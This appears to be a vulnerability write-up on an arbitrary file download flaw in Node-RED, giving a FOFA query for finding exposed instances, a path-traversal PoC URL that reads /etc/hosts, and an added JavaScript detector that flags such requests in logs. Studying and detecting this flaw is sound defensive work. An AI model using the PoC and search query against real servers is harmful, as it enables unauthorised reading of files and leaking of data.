Node-RED 任意文件下载漏洞.md (449 B, 2021-07-15 19:58:07)

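# Node-RED Arbitrary File Download Vulnerability

## Vulnerability Description

Node-RED has an arbitrary file download vulnerability that can lead to information disclosure and source code leakage.

## Affected Products

> Node-RED

## FOFA

> title="Node-RED"

## Reproduction

The page looks like this:

![Image 3](/resource/Node-RED/图片3.png)

### PoC

```
/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts
```

![Image 4](/resource/Node-RED/图片4.png)

![Image 5](/resource/Node-RED/图片5.png)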
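
A defensive check for the request pattern shown in the PoC, as an added example that is not part of the original page or of Node-RED: it percent-decodes each request path and flags any under `/ui_base/js/` that resolves outside that directory. The function names, the `app.min.js` file name and the log lines are assumptions constructed for illustration.

```javascript
// Added example (not from the original page): flag /ui_base/js/ requests that escape the directory.
const PREFIX = '/ui_base/js/'; // route taken from the PoC above

// Decode repeatedly so double-encoded separators (%252f) are normalised too.
function fullyDecode(s, maxRounds = 3) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { return cur; } // malformed escape: stop here
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Resolve "." and ".." segments the way a file-system lookup would.
function resolveSegments(p) {
  const out = [];
  for (const seg of p.split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') out.pop(); else out.push(seg);
  }
  return '/' + out.join('/');
}

// True when the request targets PREFIX but its resolved path lies outside it.
function isTraversal(requestPath) {
  const decoded = fullyDecode(requestPath.split('?')[0]).replace(/\\/g, '/');
  if (!decoded.startsWith(PREFIX)) return false;
  return !(resolveSegments(decoded) + '/').startsWith(PREFIX);
}

// Extract the request path from common-log-format lines and keep the hits.
function scanLog(lines) {
  return lines.filter((line) => {
    const m = /"(?:GET|HEAD|POST) (\S+) HTTP\/[\d.]+"/.exec(line);
    return m !== null && isTraversal(m[1]);
  });
}

// Constructed sample log lines (documentation addresses, not real traffic).
const SAMPLE_LOG = [
  '192.0.2.10 - - [15/Jul/2021:19:58:07 +0000] "GET /ui_base/js/app.min.js HTTP/1.1" 200 1024',
  '192.0.2.44 - - [15/Jul/2021:19:59:11 +0000] "GET /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts HTTP/1.1" 200 220',
  '192.0.2.44 - - [15/Jul/2021:19:59:30 +0000] "GET /ui_base/js/..%252f..%252fetc%252fhosts HTTP/1.1" 404 0',
  '192.0.2.10 - - [15/Jul/2021:20:00:02 +0000] "GET /ui_base/js/lib/..%2fapp.min.js HTTP/1.1" 200 1024',
];

for (const hit of scanLog(SAMPLE_LOG)) console.log('traversal:', hit);
```

The same resolve-then-compare logic can run in a reverse proxy or request middleware to reject such requests before they reach the file handler.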
    